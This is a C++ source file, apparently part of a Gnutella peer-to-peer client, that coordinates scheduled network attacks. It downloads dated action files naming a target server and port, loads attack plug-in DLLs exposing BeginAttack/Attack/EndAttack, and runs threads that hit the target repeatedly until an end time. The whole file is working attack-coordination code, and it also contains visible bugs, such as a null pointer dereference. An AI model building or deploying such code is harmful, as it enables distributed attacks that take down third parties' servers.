#include "stdafx.h"

#include <set>
#include <process.h>

#include "Core\common.h"
#include "Core\Buffer.h"
#include "Core\Object.h"
#include "Core\String.h"
#include "Core\List.h"
#include "Core\FileWorker.h"
#include "Core\Connection.h"
#include "Core\GnutellaWorker.h"
#include "Core\Base.h"
#include "MyTime.h"

#include "ActionManager.h"
#include "Action.h"

ActionDll::ActionDll(const char* action)
{
	CString dll;

	dll = global.options.downloadDir;
	if (dll.Right(1) != "\\")
		dll += "\\";
	dll += "ActionSharing";
	dll += action;
	dll += ".dll";
	hinst = LoadLibrary(dll);
	if (hinst != NULL)
	{
		configure = (pConfigure) GetProcAddress(hinst, "Configure");
		beginAttack = (pBeginAttack) GetProcAddress(hinst, "BeginAttack");
		attack = (pAttack) GetProcAddress(hinst, "Attack");
		endAttack = (pAttack) GetProcAddress(hinst, "EndAttack");
		if (!configure || !beginAttack || !attack || !endAttack)
		{
			FreeLibrary(hinst);
			hinst = NULL;
		}
	}
}

ActionDll::~ActionDll()
{
	if (!IsValid())
		return;
	if (performingattack)
		EndAttack();
	FreeLibrary(hinst);
	hinst = NULL;
}

void ActionDll::GetAttackTypes(CStringArray& actions)
{
	CFileFind finder;
	CString filter;
	BOOL found;

	filter = global.options.downloadDir;
	if (filter.Right(1) != "\\")
		filter += "\\";
	filter += "ActionSharing";
	filter += "*.dll";

	found = finder.FindFile(filter);
	while (found)
	{
		found = finder.FindNextFile();
		CString file;
		file = finder.GetFileTitle();
		file.Replace("ActionSharing", "");
		if (file.GetLength() > 0)
			actions.Add(file);
	}
}

bool ActionDll::IsValid()
{
	return hinst != NULL;
}

bool ActionDll::Configure(const char* name, char* configuration, int len)
{
	if (!IsValid())
		return false;
	return configure(name, configuration, len) != FALSE;
}

bool ActionDll::BeginAttack(const char* configuration, const char* target, unsigned int port)
{
	if (!IsValid())
		return false;
	performingattack = beginAttack(&attackidentifier, configuration, target, port) != FALSE;
	return performingattack;
}

bool ActionDll::Attack()
{
	if (!IsValid() || !performingattack)
		return false;
	return attack(attackidentifier) != FALSE;
}

bool ActionDll::EndAttack()
{
	if (!IsValid() || !performingattack)
		return false;
	performingattack = false;
	return endAttack(attackidentifier) != FALSE;
}

///////////////////////////////////////////////////////////////////////////////

ActionStatus::ActionStatus()
{
	statusAction = Getting;
	action = "none";
	howLong = 0;
}

ActionStatus::ActionStatus(MSXML2::IXMLDOMDocument2 *document, MSXML2::IXMLDOMNode *node)
{
	_variant_t val;
	using namespace MSXML2;
	MSXML2::IXMLDOMNodePtr n;
	
	val = node->selectSingleNode("action")->firstChild->nodeValue;
	action = (const char*)_bstr_t(val);
	n = node->selectSingleNode("actionConfiguration");
	if (n->childNodes->length > 0)
	{
		val = n->firstChild->nodeValue;
		actionConfiguration = (const char*)_bstr_t(val); 
	}
	val = node->selectSingleNode("action")->firstChild->nodeValue;
	statusAction = (Status)atoi((const char*)_bstr_t(val)); 
	val = node->selectSingleNode("schedule")->firstChild->nodeValue;
	schedule = StrToTime((const char*)_bstr_t(val));
	val = node->selectSingleNode("minutes")->firstChild->nodeValue;
	howLong = atoi((const char*)_bstr_t(val)); 
}

CTime ActionStatus::StrToTime(const char *strTime)
{
	int day;
	int month;
	int year;
	int hour;
	int minute;
	CString s(strTime);
	CString t;

	// I did write the date, therefore I read my format
	day = atoi((s.Left(2)));
	s = s.Mid(3);
	month = atoi((s.Left(2)));
	s = s.Mid(3);
	year = atoi((s.Left(4)));
	s = s.Mid(5);
	hour = atoi((s.Left(2)));
	s = s.Mid(3);
	minute = atoi((s.Left(2)));
	return CTime(year, month, day, hour, minute, 0);
};


ActionStatus::Status ActionStatus::GetStatus()
{
	return statusAction;
}

void ActionStatus::Schedule(const char* action)
{
	this->action = action;
}

void ActionStatus::Configure(const char* name)
{
	ActionDll a(action);
	if (a.IsValid())
	{
		char buf[1024];
		buf[0] = 0;
		if (a.Configure(name, buf, sizeof(buf) / sizeof(char) - 1))
			actionConfiguration = buf;
	}
}

CString ActionStatus::GetConfiguration()
{
	return actionConfiguration;
}

CString ActionStatus::ActionScheduled()
{
	return action;
}

void ActionStatus::DownloadOk()
{
	statusAction = Got;
}

void ActionStatus::StartAttackOk()
{
	statusAction = Attack;
}

void ActionStatus::TestElapsed()
{
	if (CMyTime::GetUTime() > GetEndTime())
	{
		if (statusAction == Attack)
			statusAction = Attacked;
		else if (statusAction == Got)
			statusAction = Elapsed;
	}
}

void ActionStatus::SetWhen(CTime time)
{
	schedule = time;
}

void ActionStatus::SetHowLong(int minutes)
{
	howLong = minutes;
}

bool ActionStatus::IsAttackToBeLaunched()
{
	if (action != "none" && statusAction != Attack)
	{
		CTime now = CMyTime::GetUTime();
		if (now >= schedule && now <= GetEndTime())
			return true;
	}
	return false;
}

CTime ActionStatus::GetEndTime()
{
	return schedule + CTimeSpan(0, 0, howLong, 0);
}

void ActionStatus::PersistToXML(MSXML2::IXMLDOMDocument *document, 
								MSXML2::IXMLDOMNode *rootNode, const char *name)
{
	using namespace MSXML2;
	IXMLDOMNodePtr node;
	char tmpBuf[10];

	node = document->createElement("name");
	node->appendChild(document->createTextNode(name));
	rootNode->appendChild(node);
	node = document->createElement("action");
	node->appendChild(document->createTextNode((const char*)action));
	rootNode->appendChild(node);
	node = document->createElement("actionConfiguration");
	node->appendChild(document->createTextNode((const char*)actionConfiguration));
	rootNode->appendChild(node);
	node = document->createElement("statusAction");
	node->appendChild(document->createTextNode(itoa(statusAction, tmpBuf, 10)));
	rootNode->appendChild(node);
	node = document->createElement("schedule");
	node->appendChild(document->createTextNode((const char*)schedule.Format("%d/%m/%Y %H:%M")));
	rootNode->appendChild(node);
	node = document->createElement("minutes");
	node->appendChild(document->createTextNode(itoa(howLong, tmpBuf, 10)));
	rootNode->appendChild(node);
}

//////////////////////////////////////////////////////

ActionManager *ActionManager::s_this = NULL;

ActionManager* ActionManager::Instance()
{
	if (s_this == NULL)
		s_this = new ActionManager;
	return s_this;
}

ActionManager::ActionManager()
{
}

void ActionManager::HandleFile(FileInfo* fi)
{
	using namespace std;
	map<string, ActionStatus>::iterator it;
	int year;
	int month;
	int day;
	CTime today = CMyTime::GetUTime();
	CString name(fi->name);

	// skip junk too short even to be considered
	if (name.GetLength() < 10)
		return;

	// first of all, check the action date not to be before today
	year = atoi(name.Left(4));
	month = atoi(name.Mid(5, 2));
	day = atoi(name.Mid(8, 2));
	if (year <= 0 || month <= 0 || month > 12 || day <= 0 || day > 31)
		return;

	CTime attacktime(year, month, day, 23, 59, 59);
	if (attacktime < today)
		return;

	it = actions.find((const char *)name);
	if (it == actions.end())
	{
		if (gnutella->GetFile(*fi))
		{
			actions[(const char *)name];
			Sleep(1);
		}
	}
}

void ActionManager::Save(const char* path)
{
	using namespace std;
	using namespace MSXML2;
	IXMLDOMDocumentPtr document;
	IXMLDOMNodePtr node;
	IXMLDOMNodePtr rootNode;
	map<string, ActionStatus>::iterator it;


	document.CreateInstance(__uuidof(MSXML2::DOMDocument));
	document->put_async(VARIANT_FALSE);
	node = document->createProcessingInstruction("xml", "version='1.0'");
	document->appendChild(node);
	rootNode = document->createElement("actionmanager");
	document->appendChild(rootNode);

	for (it = actions.begin(); it != actions.end(); it++)
	{
		ActionStatus& as = it->second;
		node = document->createElement("actionStatus");
		rootNode->appendChild(node);
		as.PersistToXML(document, node, it->first.c_str());
	}

	document->save((const char *)path);

}


void ActionManager::Load(const char* path)
{
	using namespace std;
	using namespace MSXML2;
	IXMLDOMDocumentPtr dom;
	IXMLDOMDocument2Ptr document;
	IXMLDOMNodePtr node;
	IXMLDOMNodePtr rootNode;
	int i;

	try
	{
		CString when;
		_variant_t val;

		dom.CreateInstance(__uuidof(MSXML2::DOMDocument));
		document = dom;
		document->put_async(VARIANT_FALSE);
		document->setProperty(_bstr_t("SelectionLanguage"), _variant_t("XPath"));
		try
		{
			document->load(path);
		}
		catch(_com_error e)
		{
			// OK, the file doesn't exist. Who cares.
			return;
		}
		rootNode = document->selectSingleNode("/actionmanager");

		for (i = 0; i < rootNode->childNodes->length; i++)
		{
			CString name;
			_variant_t var;
			node = rootNode->childNodes->item[i];
			var = node->selectSingleNode("name")->firstChild->nodeValue;
			name = (const char*) _bstr_t(var);
			ActionStatus as(document, node);
			actions[(const char*)name] = as;
		}
	}
	catch(_com_error e)
	{
		CString s = "Errore Parsificazione ActionManager file: ";
		s += path;
		AfxMessageBox(s);
	}
}

void ActionManager::Synchronize()
{
	using namespace std;
	CFileFind finder;
	CString filter;
	bool found;
	set<string> foundNames;
	map<string, ActionStatus>::iterator it;
	
	filter = global.options.downloadDir;
	if (filter.Right(1) != "\\")
		filter += "\\";
	filter += "*.love";
	found = finder.FindFile(filter) != FALSE;
	while (found)
	{
		CString name;
		found = finder.FindNextFile() != FALSE;
		name = finder.GetFileName();
		foundNames.insert((const char *)name);
		
		if (actions.find((const char *)name) == actions.end())
		{
			Action a(finder.GetFilePath());
			ActionStatus& as = actions[(const char *)name];
			as.DownloadOk();
			as.SetWhen(a.GetWhen());
			as.SetHowLong(a.GetHowLong());
		}
	}

	it = actions.begin();
	while (it != actions.end())
		if (it->second.GetStatus() == ActionStatus::Got &&
				foundNames.find(it->first) == foundNames.end())
			it = actions.erase(it);
		else
			it++;
}

BOOL ActionManager::OnGetEvent()
{
	using namespace std;
	ConnectionInfo *con;
	List conList;
	map<string, ActionStatus>::iterator it;

	gnutella->GetDownloadInfo(&conList);

	it = actions.begin();
	while (it != actions.end())
	{
		bool deleted = false;

		ActionStatus& as = it->second;
		if (as.GetStatus() == ActionStatus::Getting)
		{
			bool found = false;
			conList.GetFirst(FALSE);
			while (con = (ConnectionInfo *)conList.GetNext())
			{
				FileInfo& fi = con->fi;
				if (strcmp(fi.name, it->first.c_str()) == 0)
				{
					found = true;
					break;
				}
			}
			if (!found)
			{
				CFileFind finder;
				CString fileName = con->fi.directory;
				if (fileName.Right(1) != "\\")
					fileName += "\\";
				fileName += con->fi.name;
				if (finder.FindFile(fileName))
				{
					Action a(fileName);
					as.DownloadOk();
					as.SetWhen(a.GetWhen());
					as.SetHowLong(a.GetHowLong());
				}
				else
				{
					it = actions.erase(it);
					deleted = true;
				}
			}
		}
		if (!deleted)
			it++;
	}
	return TRUE;
}

void ActionManager::ScheduleAction(const char *name, const char *type)
{
	using namespace std;

	map<string, ActionStatus>::iterator it;
	if (actions.find(name) == actions.end())
		return;
	actions[name].Schedule(type);
}

void ActionManager::Configure(const char *name)
{
	using namespace std;

	map<string, ActionStatus>::iterator it;
	if (actions.find(name) == actions.end())
		return;
	CString path = global.options.downloadDir;
	if (path.ReverseFind('\\') != -1)
		path += "\\";
	Action a(path + name);
	actions[name].Configure(a.GetName());
}

CString ActionManager::GetStatus(const char *name) 
{
	using namespace std;

	map<string, ActionStatus>::iterator it;
	CString s;
	
	it = actions.find(name);
	if (it == actions.end())
		return "none";
	ActionStatus& as = it->second;
	if (as.GetStatus() == ActionStatus::Attack)
		s = "Attacking ";
	else if (as.GetStatus() == ActionStatus::Got)
		s = "Scheduled ";
	else if (as.GetStatus() == ActionStatus::Attacked)
		s = "Done ";
	else if (as.GetStatus() == ActionStatus::Elapsed)
		s = "Late for ";
	if (as.ActionScheduled() == "none")
		s = "none";
	else 
		s += as.ActionScheduled();
	return s;
}

void ActionManager::PerformAttacks()
{
	using namespace std;

	map<string, ActionStatus>::iterator it;

	for (it = actions.begin(); it != actions.end(); it++)
	{
		ActionStatus& as = it->second;
		if (as.IsAttackToBeLaunched())
		{
			AttackThread *pat = new AttackThread(it->first.c_str(), as.ActionScheduled(), as.GetConfiguration(), as.GetEndTime());
			pat->RunAndKillYourself();			
			as.StartAttackOk();
			// no need to delete pat, it's a nihilist object
		}
		else 
			as.TestElapsed();
	}
}

HANDLE AttackThread::exitingEvent = 0;
LONG AttackThread::threadCount = 0;

AttackThread::AttackThread(const char *name, const char *action, const char *configuration, CTime endTime)
{
	CString path = global.options.downloadDir;
	if (path.ReverseFind('\\') != -1)
		path += "\\";

	pAction = new Action(path + name);
	this->action = action;
	this->configuration = configuration;
	this->endTime = endTime;
	if (exitingEvent == 0)
		exitingEvent = CreateEvent(NULL, TRUE, FALSE, NULL);
}

AttackThread::~AttackThread()
{
	delete pAction;
}

void AttackThread::RunAndKillYourself()
{
	_beginthread(s_Run, 0, this);
}

void  AttackThread::s_Run(void *pToMe)
{
	InterlockedIncrement(&threadCount);
	AttackThread *myself = static_cast<AttackThread*>(pToMe);
	myself->Run();
	InterlockedDecrement(&threadCount);
}

void AttackThread::Run()
{
	ActionDll a(action);

	if (a.BeginAttack(configuration, pAction->GetServer(), pAction->GetPort()))
	{
		while (CMyTime::GetUTime() < endTime)
		{
			if (!a.Attack())
				break;
			if (WaitForSingleObject(exitingEvent, 0) == WAIT_OBJECT_0)
				break;
		}
		a.EndAttack();			
	}
	delete this;
}

void AttackThread::TerminateAllAttackerThreads()
{
	CTime waitFor = CMyTime::GetUTime() + CTimeSpan(0,0,0,30);
	SetEvent(exitingEvent);
	while (CMyTime::GetUTime() < waitFor && threadCount > 0)
		Sleep(1000);
	Sleep(0);
}
